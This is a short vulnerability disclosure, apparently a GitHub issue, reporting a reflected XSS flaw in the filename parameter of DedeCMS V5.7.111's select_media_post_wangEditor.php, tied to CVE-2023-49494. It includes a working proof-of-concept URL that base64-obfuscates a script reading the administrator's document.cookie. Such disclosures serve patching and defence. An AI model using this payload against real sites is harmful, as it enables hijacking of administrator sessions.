DedeCMS-V5.7.111 Reflective XSS vulnerability in select_media_post_wangEditor.php

[Hebing123]

Description
DedeCMS-V5.7.111 has Reflective XSS vulnerability in filename parameter of select_media_post_wangEditor.php

Proof of Concept

http://target-ip/uploads/include/dialog/select_media_post_wangEditor.php?filename=1%3Cinput%20onfocus=eval(atob(this.id))%20id=YWxlcnQoZG9jdW1lbnQuY29va2llKTs=%20autofocus%3E

Impact
Reflective XSS vulnerability triggered by administrator accessing the link.

[Hebing123]

This is the vulnerability exploitation reference for CVE-2023-49494.

[Hebing123]

Note: The POC changes depending on whether the site runs in the uploads directory.